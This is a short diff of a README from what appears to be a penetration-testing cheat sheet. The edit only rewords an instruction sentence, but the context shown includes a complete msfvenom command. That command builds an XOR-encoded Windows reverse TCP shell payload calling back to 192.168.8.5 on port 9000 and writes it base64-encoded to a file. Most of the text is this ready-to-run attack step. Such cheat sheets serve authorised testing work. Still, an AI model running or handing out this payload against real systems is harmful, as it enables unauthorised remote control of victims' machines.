drgreenthumb93/aktuelles_penetration-testing-cheat-sheet/README.md

 ### Generate a Reverse Shell Payload for Windows OS

-To generate a `Base64 encoded payload`, use one of the following MSFvenom commands (modify them to your need):
+To generate a `Base64 encoded payload`, use one of the following MSFvenom commands, modify them to your need:

 ```fundamental
 msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > payload.txt